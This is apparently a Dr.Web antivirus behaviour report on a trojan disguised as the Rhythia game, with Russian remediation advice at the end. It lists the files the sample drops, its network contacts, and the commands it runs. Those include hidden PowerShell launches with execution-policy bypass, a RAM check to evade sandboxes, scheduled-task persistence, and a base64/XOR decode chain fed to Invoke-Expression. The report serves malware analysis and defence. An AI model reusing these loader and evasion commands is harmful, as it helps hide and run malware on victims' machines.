  • %APPDATA%\rhythia\shader_cache\ssilimportancemapshaderrd\6c7db621e01f163f7fd5e9f70c773e06433e17a5fb96e54db218d422d723aacb\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\ssilblurshaderrd\c828d4bcf21ef1709d97f8548e6525f7879a2a375039528da204ac3b329c718e\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\ssilinterleaveshaderrd\1827fdf7222528b41b71648898590a2b481dff874d5abb29dee45a9987f785ba\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\ssaoshaderrd\b4930144c0d6d905950e21dba7bee754e2d9afe084ae8d5555df96fce770139f\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\ssaoimportancemapshaderrd\4edba1c913bbcf0fe2fb8c435ab1359f70a7444f7dd23c4ce34fc93c45843eb3\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\ssaoblurshaderrd\fcd180ca97c9c60af86c6ab2e8c04c9a5151590707bbf1e28568cee1a7d1f79b\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\ssaointerleaveshaderrd\eb4ca8219783922a87341a3a2ad615ecc8356bb6e044ce477536e99902f96a22\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\screenspacereflectiondownsampleshaderrd\ded9db1eac9e5b4ad8eec541c15639621959cc7ba975c35a7b00e693dbd63ed2\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\screenspacereflectionhizshaderrd\b6bddb256a75b062d6dcc54cab3068e5681c11efabeecfd56a8b6aa811fd04f7\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\screenspacereflectionshaderrd\3f11fe3b906bae8febe9b4aa23c6e89fa571e2edae7b9517b7f00208fdccae97\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\screenspacereflectionfiltershaderrd\eb63705abd051e467483bd6b2685b6faedabead31ba6939e17542ab4de0459d4\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\screenspacereflectionresolveshaderrd\81e8ef1f8dea212538147e6fe6944ceda353f1384bfc9862c90015b21db84c65\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\subsurfacescatteringshaderrd\a0a69873fdce28a7a8c50458dcc8506beabb26c6baf5449448339e820eeb917d\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\skyshaderrd\674aa6a56f4fc992ebe09ae7e571e379f6e557dd2354506b5062519ad7a427e1\de678811d1bad3cad4892a8db7b6ea0be197d51d.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\skyshaderrd\674aa6a56f4fc992ebe09ae7e571e379f6e557dd2354506b5062519ad7a427e1\03e3b11c69e24394b2d955a8c0ba85587bb70839.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\voxelgishaderrd\020f6e5393138c6a26909fdf3f9bdebabe18dcd37d7444b7c8006364aa00c63e\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\voxelgidebugshaderrd\30164a8664ea1d0b0caec729a89edc30b41521ceb006a0b39e12d5c0455a7a5b\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\sdfgipreprocessshaderrd\570afa2fb30077473ab0e981ef16979b1b8655516ee0d556dc33020f9b771742\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\sdfgidirectlightshaderrd\64ad7310244510c316ee6a757d8aca3c2e569d002f9a977a411dc3eed01aa136\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\sdfgiintegrateshaderrd\41b4833fa068f8f1d6aca463d4264bd17b48cdb4b8e9a4c6238ce96804fab13d\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\gishaderrd\687d1c141f44aed88a07e61d750649cda6236ef2205b4f854f8105ca7b94e6e7\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\sdfgidebugshaderrd\7e91b12089148e9624d3b772c591a8eee798246bf853e9ec512804a7f33b3889\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\sdfgidebugprobesshaderrd\04d93c03fbe1db79d1166bf8062718b246216fd24fea2444a0ff1c91794984c7\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\volumetricfogshaderrd\757251820332d10b11f8db2ad4fb78c2ab5b327b747dabc3a12824d51281115c\9a227745af2d65830f930370a9fbba551fbd6f60.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\volumetricfogprocessshaderrd\19f039cd73a0ac6607074fc92d3b2f57204b62a447b166e83d0e60040e2cf6a4\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\bokehdofshaderrd\f0818466663de70a3eb3cacafd3e366a662fec8df19ee39678456c56e0992de3\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\copyshaderrd\e9cc8703737058ab94419d921c4ffa210eedec9e9902e44b4b3b0898bea779ad\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\copytofbshaderrd\d8c8cfaf4afd14e907114b99e2f0ca909b68e51c06848dcaf4d960b93dc13cb8\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\cubetodpshaderrd\0352697dfa4e1cfa7c828f5dbe00a582b11eb7ecdaaf632adeef06f06d4b9c96\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\cubetooctmapshaderrd\5fc57d05f5d131338b97f340dc2c3656545f2e042759ccfe92bdbbf87ab5eac3\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\octmapdownsamplershaderrd\f7cc7d472883dcc7f351a5ffde028bb15c7b5d7589eacdf02c3633cf2a7829c5\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\octmapfiltershaderrd\51d055a87b73bba94f62ffe0b579322bddb3d5638e4db2bcedbcd05733e17083\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\octmaproughnessshaderrd\953daee2b7c11cf846dd5b590a624c33a6d367972b684494ecbbb5fdeb8e9b1f\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\specularmergeshaderrd\f37e3095c1ac9cac056c9f2aa34f04ba24881a09cdcd83d20dbf7897f273b846\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\shadowfrustumshaderrd\66c287915614d37b9e7cab38554ceb8cf9587c0a1ad8f3ed523d1119d02a432a\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\motionvectorsshaderrd\23e525d5cbab296a974d3ff5dca6670923233ede9e68996ab30d7ff8704cddf7\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\luminancereduceshaderrd\e1310a90e84d7a218320cf28617a5e388c8a11a861edbd726669e71fc3f911a8\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\smaaedgedetectionshaderrd\d87a8d48df4d7f1e99d50fdda5183397a5adb65dc240df7fc07a7ce2955fe3d7\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\smaaweightcalculationshaderrd\8e27991ff4e390c0330de8c3b47a42294afc92f41d1049dfd06896302c2e0b04\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\smaablendingshaderrd\607ccc762120fdee816ab47fd2451dbbaa886d445321b7411140032a35f1a739\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\tonemapshaderrd\3769da6e8bdc270efe950e09ec5b0ed4d95998156701f9bafd635fe9d5972f71\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\fsrupscaleshaderrd\9a52fdf3c5bde6da20535b5db563542c4713265bf5c8bb52fad6ef2a5b526337\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\resolveshaderrd\1f73a86e4de984063f8d52430568260a983404585561eebf294292dcf117aaef\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\blitshaderrd\de1bb2427d3dcc66b0497adb6bb381a58368fc24648c5e77b936034fd86c488f\087916079fba7c625e62b0c2cca570e0fb87c99a.d3d12.cache
  • %APPDATA%\rhythia\current_profile.txt
  • %APPDATA%\rhythia\colorsets\default.txt
  • %APPDATA%\rhythia\profiles\default\default.json
  • %APPDATA%\rhythia\skins\default\fail.mp3
  • %APPDATA%\rhythia\skins\default\hit.mp3
  • %APPDATA%\rhythia\skins\default\game\cursor.png
  • %APPDATA%\rhythia\skins\default\game\grid.png
  • %APPDATA%\rhythia\skins\default\game\health.png
  • %APPDATA%\rhythia\skins\default\game\health_background.png
  • %APPDATA%\rhythia\skins\default\game\hits.png
  • %APPDATA%\rhythia\skins\default\game\miss_feedback.png
  • %APPDATA%\rhythia\skins\default\game\misses.png
  • %APPDATA%\rhythia\skins\default\game\panel_left_background.png
  • %APPDATA%\rhythia\skins\default\game\panel_right_background.png
  • %APPDATA%\rhythia\skins\default\game\progress.png
  • %APPDATA%\rhythia\skins\default\game\progress_background.png
  • %APPDATA%\rhythia\skins\default\modifiers\ghost.png
  • %APPDATA%\rhythia\skins\default\modifiers\nofail.png
  • %APPDATA%\rhythia\skins\default\ui\background_tile.gdshader
  • %APPDATA%\rhythia\skins\default\ui\background_tile.png
  • %APPDATA%\rhythia\skins\default\ui\jukebox_pause.png
  • %APPDATA%\rhythia\skins\default\ui\jukebox_play.png
  • %APPDATA%\rhythia\skins\default\ui\jukebox_skip.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\add_video.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\author.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\copy.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\delete.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\favorite.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\filter.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\grabber_normal.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\grabber_pressed.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\grabber_tick.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\import.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\layout_grid.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\layout_list.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\open_folder.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\play.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\random.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\remove_video.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\search.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\settings.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\sort.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\speed_middle.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\speed_minus.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\speed_minus_minus.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\speed_plus.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\speed_plus_plus.png
  • %APPDATA%\rhythia\skins\default\ui\buttons\unfavorite.png
  • %APPDATA%\rhythia\skins\default\ui\play\map_button_cover.gdshader
  • %APPDATA%\rhythia\skins\default\ui\play\favorite.png
  • %APPDATA%\rhythia\skins\default\ui\play\grid_cover_background.png
  • %APPDATA%\rhythia\skins\default\ui\play\mapinfo_cover_background.png
  • %APPDATA%\rhythia\skins\default\ui\play\maplist_mask.png
  • %APPDATA%\rhythia\skins\default\ui\play\maplist_selection_cursor.png
  • %APPDATA%\rhythia\skins\default\ui\play\scrollbar_background_bottom.png
  • %APPDATA%\rhythia\skins\default\ui\play\scrollbar_background_middle.png
  • %APPDATA%\rhythia\skins\default\ui\play\scrollbar_background_top.png
  • %APPDATA%\rhythia\skins\default\ui\play\scrollbar_bottom.png
  • %APPDATA%\rhythia\skins\default\ui\play\scrollbar_middle.png
  • %APPDATA%\rhythia\skins\default\ui\play\scrollbar_top.png
  • %APPDATA%\rhythia\data.db-journal
  • %APPDATA%\rhythia\data.db
  • %APPDATA%\rhythia\profiles\default.json
  • %APPDATA%\rhythia\skins\default\config.toml
  • %APPDATA%\rhythia\shader_cache\skyshaderrd\674aa6a56f4fc992ebe09ae7e571e379f6e557dd2354506b5062519ad7a427e1\7a23d98c17ea2e507231ac6c6601364b358faf27.d3d12.cache
  • %APPDATA%\rhythia\stats
  • %APPDATA%\rhythia\shader_cache\canvasshaderrd\275d4d34e3615bf0802f2ef82109d1cde17c7aa8031e89154c70fc7b3d40d52f\8a7277c8d3ac029b087c3fa9c55de85560be5119.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\canvasshaderrd\275d4d34e3615bf0802f2ef82109d1cde17c7aa8031e89154c70fc7b3d40d52f\45fb1ddc6499e56682916a355ce2839e61f42dfe.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\sceneforwardclusteredshaderrd\ddf71e2b0a93f8f42fc8827ef66052f76ea3654cfcd999e621135fc1399a5a79\ab0b960474f1491b42ef9f2ca13dbd4ccaf64911.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\sceneforwardclusteredshaderrd\ddf71e2b0a93f8f42fc8827ef66052f76ea3654cfcd999e621135fc1399a5a79\111f8cfd3c260d918df85827eb251dc36a43cb13.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\canvasshaderrd\275d4d34e3615bf0802f2ef82109d1cde17c7aa8031e89154c70fc7b3d40d52f\0f24ff89de01f14f6ed13fcb17062d4fd57b8a82.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\sceneforwardclusteredshaderrd\ddf71e2b0a93f8f42fc8827ef66052f76ea3654cfcd999e621135fc1399a5a79\d931a86898f265cc31f1228f5036ad8d07425c46.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\sceneforwardclusteredshaderrd\ddf71e2b0a93f8f42fc8827ef66052f76ea3654cfcd999e621135fc1399a5a79\c140eb3296a16c89668476f1ae511f0623e00914.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\sceneforwardclusteredshaderrd\ddf71e2b0a93f8f42fc8827ef66052f76ea3654cfcd999e621135fc1399a5a79\443c1e755833aa97696290c8a1388b81bd4579b2.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\sceneforwardclusteredshaderrd\ddf71e2b0a93f8f42fc8827ef66052f76ea3654cfcd999e621135fc1399a5a79\cefcdd1fec83a718c828cf430d139123bd2cc844.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\canvasshaderrd\275d4d34e3615bf0802f2ef82109d1cde17c7aa8031e89154c70fc7b3d40d52f\6f21be5fd841a571351e222012f9dd118a3e3234.d3d12.cache
  • %APPDATA%\rhythia\shader_cache\canvasshaderrd\275d4d34e3615bf0802f2ef82109d1cde17c7aa8031e89154c70fc7b3d40d52f\e4f9877e74a6c0e58c9b014a677a8e728b7f62ca.d3d12.cache
  • %APPDATA%\rhythia\meshes\square.obj
  • %APPDATA%\rhythia\meshes\square.mtl
  • %APPDATA%\rhythia\meshes\squircle.obj
  • %APPDATA%\rhythia\meshes\squircle.mtl
Sets the 'hidden' attribute to the following files
  • %HOMEPATH%\downloads\cpu.exe
  • %APPDATA%\rhythia\stats
Deletes following files that it created itself
  • %TEMP%\__psscriptpolicytest_cj5emcqf.grq.ps1
  • %TEMP%\__psscriptpolicytest_uvdb1k1n.xx1.psm1
  • %TEMP%\__psscriptpolicytest_nm5xwyrg.ivt.ps1
  • %TEMP%\__psscriptpolicytest_nctydgxd.fdv.psm1
  • %TEMP%\__psscriptpolicytest_q5vwksro.qet.ps1
  • %TEMP%\__psscriptpolicytest_yfb4lofo.kd0.psm1
  • %TEMP%\__psscriptpolicytest_5jqpxf4s.i5x.ps1
  • %TEMP%\__psscriptpolicytest_nfcv3ga2.svo.psm1
  • %APPDATA%\rhythia\data.db-journal
Modifies the following files
  • %LOCALAPPDATA%\microsoft\windows\powershell\startupprofiledata-noninteractive
Network activity
Connects to
  • 'dl.#####oxusercontent.com':443
  • '18#.#1.252.158':80
  • '17#.#6.136.252':56001
TCP
HTTP GET requests
  • http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?cc##############
Other
  • 'dl.#####oxusercontent.com':443
  • '17#.#6.136.252':56001
  • 'ap#.#ithub.com':443
UDP
  • DNS ASK dl.#####oxusercontent.com
  • DNS ASK ap#.#ithub.com
Miscellaneous
Creates and executes the following
  • 'C:\users\public\rhythialauncher.exe'
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command "Unblock-File -Path 'C:\Users\Public\rhythia.bat'"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\Public\rhythia.bat' -ArgumentList 'silent' -WindowStyle HIdden"
  • '%HOMEPATH%\downloads\cpu.exe' -c "$out=''; foreach ($line in Get-Content 'rEgX.cmd') { if ($line.StartsWith('::')) { $text = $line.Substring(2).TrimStart(); $out += $text + \"`n\" } }; Set-Content -Path 'icon.png' -Value $o...
  • '%HOMEPATH%\downloads\cpu.exe' -c "$out = ''; foreach ($line in Get-Content 'rEgX.cmd') { if ($line -match '^@\s+(.+)') { $clean = $matches[1]; $out += $clean + \"`n\" } }; Set-Content -Path 'logo.jpg' -Value $out"
  • '%HOMEPATH%\downloads\cpu.exe' -c "$k='0f';$d=[Convert]::FromBase64String((Get-Content 'logo.jpg' -Raw));$s='';$idx=0;foreach($b in $d){$s+=[char]($b -bxor [byte][char]$k[$idx]);$idx++;if($idx -ge $k.Length){$idx=0}};iEx $s"
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Expand-Archive -Force 'C:\Users\Public\rhythia.zip' 'C:\Users\Public\rhythia-online'"
  • 'C:\users\public\rhythia-online\rhythia-online\rhythia.exe'
Executes the following
  • '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\rhythia.bat" "
  • '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\rhythia.bat" silent "
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -Command "try{$r=(Get-CimInstance Win32_ComputerSystem).TotalPhysicalMemory;if(-not$r -or$r -lt 3221225472){exit 123}else{exit 0}}catch{exit 123}"
  • '<SYSTEM32>\attrib.exe' +s +h IntelDrIver
  • '<SYSTEM32>\attrib.exe' +h %HOMEPATH%\Downloads\CPU.exe
  • '<SYSTEM32>\schtasks.exe' /create /tn applicationbackup /xml %APPDATA%\applicationbackup.xml /f
  • '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\rhythia.bat" "' (with hidden window)
  • '<SYSTEM32>\cmd.exe' /c ""C:\Users\Public\rhythia.bat" silent "' (with hidden window)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -Command "Expand-Archive -Force 'C:\Users\Public\rhythia.zip' 'C:\Users\Public\rhythia-online'"' (with hidden window)

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Демо бесплатно

 

Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

Демо бесплатно

 

Скачать Dr.Web

По серийному номеру

Скачать Dr.Web с Apple Store

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Демо бесплатно

 

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке

Скачать с сайта
Скачать с Google Play